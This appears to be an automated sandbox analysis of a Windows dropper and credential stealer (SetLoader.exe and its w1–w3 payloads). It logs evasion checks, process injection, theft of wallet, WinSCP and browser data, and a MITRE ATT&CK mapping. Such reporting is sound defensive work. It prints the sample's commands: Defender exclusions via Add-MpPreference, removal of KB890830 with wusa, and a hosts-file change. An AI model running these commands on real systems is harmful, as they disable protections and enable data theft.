              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dwm.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dwm.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\dwm.exe System information queried: FirmwareTableInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4432
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5455
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5764
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4067
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Dropped PE file which has not been started: C:\Windows\Temp\kzezoxxlsgop.sys
              Source: C:\Users\user\Desktop\SetLoader.exe Check user administrative privileges: GetTokenInformation
              Source: C:\Windows\System32\conhost.exe API coverage: 0.9 %
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe TID: 5024 Thread sleep time: -90000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536 Thread sleep count: 4432 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092 Thread sleep count: 5455 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 5764 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 4067 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
              Source: C:\Windows\System32\wusa.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\dwm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0061C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0062E560 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_00630B80 VirtualQuery,GetSystemInfo
              Source: w1.exe, 00000004.00000003.2223062248.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2277021614.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWI=
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: w1.exe, 00000004.00000002.2306124438.0000000000E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\SetLoader.exe API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0063647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0063A640 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0063E680 GetProcessHeap
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe Process token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0063215D SetUnhandledExceptionFilter
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_006312D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_00631FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\conhost.exe Code function: 67_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtClose: Direct from: 0x1402F4C1E
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140AD36C1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x140247785
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x1408A9EA8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x140B07BC5
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x140297727
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x1409189E7
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtUnmapViewOfSection: Direct from: 0x140ED698F
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x1408B62E8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x1402FDD45
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Indirect: 0x14088F35F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x14024B364
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x1408FA0E3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x1408F5582
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140AE2BF3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x1402CD6A3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x14089D8A0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Direct from: 0x14023CFC7
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x140909645
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtUnmapViewOfSection: Direct from: 0x1409469E6
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140AE9C00
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtMapViewOfSection: Direct from: 0x14027C44D
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtOpenFile: Direct from: 0x14026F9ED
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140ED6451
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe NtProtectVirtualMemory: Indirect: 0x1401EAEB5
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140AF7AC9
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x140947D71
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x140927E98
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtProtectVirtualMemory: Direct from: 0x1408FCB79
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe NtOpenFile: Direct from: 0x140B073F7
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe NtProtectVirtualMemory: Direct from: 0x140EDB319
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Thread register set: target process: 7112
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Thread register set: target process: 6072
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0062DAE0 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,GetLastError,GetLastError,GetTickCount,_swprintf,GetLastError,GetModuleFileNameW,_swprintf,CreateFileMappingW,GetCommandLineW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW
              Source: C:\Users\user\Desktop\SetLoader.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
              Source: C:\Users\user\Desktop\SetLoader.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
              Source: C:\Users\user\Desktop\SetLoader.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\PcHealthTool\HealthTool.exe Process created: C:\Windows\System32\dwm.exe dwm.exe
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0062CEBF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_006227A9 cpuid
              Source: C:\Users\user\Desktop\SetLoader.exe Code function: 0_2_0062D0AB GetLocaleInfoW,GetNumberFormatW
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061D076 GetVersionExW,0_2_0061D076
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | File written: C:\Windows\System32\drivers\etc\hosts

              Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Directory queried: C:\Users\user\Documents
MITRE ATT&CK Matrix (techniques per tactic; the number of matching signatures, where any, is given in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (11); Native API (1); Command and Scripting Interpreter (2); Service Execution (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Windows Service (11); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Windows Service (11); Process Injection (111); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: File and Directory Permissions Modification (1); Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (131); Process Injection (111)
Credential Access: OS Credential Dumping (1); Credential API Hooking (1); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); File and Directory Discovery (12); System Information Discovery (56); Security Software Discovery (131); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); Remote System Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery
